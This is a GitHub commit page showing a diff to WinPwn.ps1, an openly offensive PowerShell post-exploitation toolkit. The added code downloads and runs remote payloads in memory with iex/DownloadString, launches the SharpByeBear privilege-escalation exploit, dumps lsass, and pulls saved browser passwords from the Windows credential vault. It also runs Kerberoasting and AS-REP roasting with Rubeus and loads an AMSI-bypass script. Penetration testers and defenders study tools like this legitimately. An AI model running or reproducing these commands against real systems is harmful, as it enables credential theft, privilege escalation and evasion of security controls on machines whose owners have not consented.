Skip to content

Commit

Permalink
Add ByeBear Exploit && Grouper 2 GPO Audit
Browse files Browse the repository at this point in the history
  • Loading branch information
S3cur3Th1sSh1t authored Jul 8, 2019
1 parent 80f359e commit 97f9aa2
Showing 1 changed file with 64 additions and 19 deletions.
83 changes: 64 additions & 19 deletions WinPwn.ps1
Original file line number Diff line number Diff line change
Expand Up @@ -155,7 +155,7 @@ function sharpcradle{
if ($polar)
{
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Invoke-Sharpcradle/master/Invoke-Sharpcradle.ps1')
$polaraction = Read-Host -Prompt 'Do you have a valid username and password to elevate privileges?'
$polaraction = Read-Host -Prompt 'Do you have a valid username and password for CVE-2019-1069?'
if ($polaraction -eq "yes" -or $polaraction -eq "y" -or $polaraction -eq "Yes" -or $polaraction -eq "Y")
{
$username = Read-Host -Prompt 'Please enter the username'
Expand All @@ -178,22 +178,25 @@ function sharpcradle{
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/SharpPolarbearx86.exe -argument1 license.rtf $username $password
}

<#$system = Read-Host -Prompt 'Did you get a system shell? (y/n)'
if ($system -eq "no" -or $system -eq "n" -or $system -eq "No" -or $system -eq "N")
{
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/SharpByeBear.exe -argument1 "license.rtf 2"
Write-Host -ForegroundColor Yellow 'Click into the search bar on your lower left side'
Start-Sleep -Seconds 15
Write-Host 'Next Try..'
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/SharpByeBear.exe -argument1 "license.rtf 2"
Write-Host -ForegroundColor Yellow 'Click into the search bar on your lower left side'
Start-Sleep -Seconds 15
}#>
move env:USERPROFILE\Appdata\Local\temp\license.rtf C:\windows\system32\license.rtf
del .\schedsvc.dll
del .\schtasks.exe
del C:\windows\system32\tasks\test
}
else
{
$system = Read-Host -Prompt 'You can also try to elevate privileges using the last sandboxescaper vuln (ByeBear). Lets do it? (y/n)'
if ($system -eq "no" -or $system -eq "n" -or $system -eq "No" -or $system -eq "N")
{
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/SharpByeBear.exe -argument1 "license.rtf 2"
Write-Host -ForegroundColor Yellow 'Click into the search bar on your lower left side'
Start-Sleep -Seconds 15
Write-Host 'Next Try..'
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/SharpByeBear.exe -argument1 "license.rtf 2"
Write-Host -ForegroundColor Yellow 'Click into the search bar on your lower left side'
Start-Sleep -Seconds 15
}
}
}
else
{
Expand Down Expand Up @@ -409,7 +412,14 @@ function kittielocal
{
Invoke-WCMDump >> $currentPath\Exploitation\WCMCredentials.txt
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Invoke-Sharpcradle/master/Invoke-Sharpcradle.ps1')
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/blob/master/Ghostpack/SafetyKatz.exe?raw=true
$lsass = Read-Host -Prompt 'Only dump lsass without using the cat (more stealth)? (recommended) (yes/no)'
if ($lsass -eq "yes" -or $lsass -eq "y" -or $lsass -eq "Yes" -or $lsass -eq "Y")
{
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/SafetyDump.ps1')
Write-Host -ForegroundColor Yellow 'Dumping lsass to C:\windows\temp\debug.bin :'
Safetydump
}
else{Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/blob/master/Ghostpack/SafetyKatz.exe?raw=true}

}
else
Expand Down Expand Up @@ -509,6 +519,7 @@ function localreconmodules
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex >> "$currentPath\LocalRecon\NetRoutes.txt"
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State >> "$currentPath\LocalRecon\ArpTable.txt"
netstat -ano >> "$currentPath\LocalRecon\ActiveConnections.txt"
Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -Recurse | Get-ItemProperty -Name Version, Release -ErrorAction 0 | where { $_.PSChildName -match '^(?!S)\p{L}'} | select PSChildName, Version, Release >> "$currentPath\LocalRecon\InstalledDotNetVersions"
Write-Host -ForegroundColor Yellow 'Getting Shares'
net share >> "$currentPath\LocalRecon\Networkshares.txt"
Write-Host -ForegroundColor Yellow 'Getting hosts file content'
Expand Down Expand Up @@ -720,10 +731,16 @@ function localreconmodules
$IE = Read-Host -Prompt 'Dump IE / Edge Browser passwords? (yes/no)'
if ($IE -eq "yes" -or $IE -eq "y" -or $IE -eq "Yes" -or $IE -eq "Y")
{
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault.RetrieveAll() | % { $_.RetrievePassword();$_ } >> "$currentPath\Exploitation\InternetExplorer_Credentials.txt"
}
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault.RetrieveAll() | % { $_.RetrievePassword();$_ } >> "$currentPath\Exploitation\InternetExplorer_Credentials.txt"
}
$browserinfos = Read-Host -Prompt 'Dump all installed Browser history and bookmarks? (yes/no)'
if ($browserinfos -eq "yes" -or $browserinfos -eq "y" -or $browserinfos -eq "Yes" -or $browserinfos -eq "Y")
{
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Get-BrowserInformation.ps1')
Get-BrowserInformation >> "$currentPath\LocalRecon\AllBrowserHistory.txt"
}
}

function passhunt
Expand Down Expand Up @@ -955,9 +972,30 @@ function domainreconmodules
{
passhunt -domain $true
}

$gpos = Read-Host -Prompt 'Check domain Group policies for common misconfigurations using Grouper2? (yes/no)'
if ($gpos -eq "yes" -or $gpos -eq "y" -or $gpos -eq "Yes" -or $gpos -eq "Y")
{
GPOAudit
}

}

function GPOAudit
{
<#
.DESCRIPTION
Check Group Policies for common misconfigurations using Grouper2.
Author: @securethisshit
License: BSD 3-Clause
#>
#Domain Recon
$currentPath = (Get-Item -Path ".\" -Verbose).FullName
pathcheck
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Invoke-Sharpcradle/master/Invoke-Sharpcradle.ps1')
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/blob/master/Ghostpack/Grouper2.exe?raw=true -argument1 "-f" -argument2 "$currentPath\DomainRecon\GPOAudit.html"
}


function reconAD
{
Expand Down Expand Up @@ -1364,6 +1402,11 @@ function kerberoasting
pathcheck
Write-Host -ForegroundColor Yellow 'Starting Exploitation Phase:'
Write-Host -ForegroundColor Red 'Kerberoasting active:'
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Invoke-Sharpcradle/master/Invoke-Sharpcradle.ps1')
Write-Host -ForegroundColor Yellow 'Doing Kerberoasting + ASRepRoasting using rubeus. Output goes to .\Exploitation\'
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/Ghostpack/Rubeus.exe -argument1 asreproast -argument2 "/format:hashcat" >> $currentPath\Exploitation\ASreproasting.txt
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/Ghostpack/Rubeus.exe -argument1 kerberoast -argument2 "/format:hashcat" >> $currentPath\Exploitation\Kerberoasting_Rubeus.txt
Write-Host -ForegroundColor Yellow 'Using the powershell version for sure'
cmd /c start powershell -Command {$currentPath = (Get-Item -Path ".\" -Verbose).FullName;$Wcl = new-object System.Net.WebClient;$Wcl.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/amsi.ps1');IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-Kerberoast -OutputFormat Hashcat | fl >> $currentPath\Exploitation\Kerberoasting.txt;Write-Host -ForegroundColor Yellow ''Module finished, Hashes saved to .\Exploitation\Kerberoasting.txt:'' ;pause}
}

Expand Down Expand Up @@ -1567,7 +1610,8 @@ __ ___ ____
Write-Host -ForegroundColor Green '19. Execute some C# Magic for Creds, Recon and Privesc!'
Write-Host -ForegroundColor Green '20. Load custom C# Binaries from a webserver to Memory and execute them!'
Write-Host -ForegroundColor Green '21. Show some polar bears in action!'
Write-Host -ForegroundColor Green '22. Exit. '
Write-Host -ForegroundColor Green '22. Do an Group Policy Audit using Grouper2!'
Write-Host -ForegroundColor Green '23. Exit. '
Write-Host "================ WinPwn ================"
$masterquestion = Read-Host -Prompt 'Please choose wisely, master:'

Expand All @@ -1594,9 +1638,10 @@ __ ___ ____
19{sharpcradle -allthosedotnet $true}
20{sharpcradle}
21{sharpcradle -polar $true}
22{GPOAudit}
}
}
While ($masterquestion -ne 22)
While ($masterquestion -ne 23)


#End
Expand Down

0 comments on commit 97f9aa2

Please sign in to comment.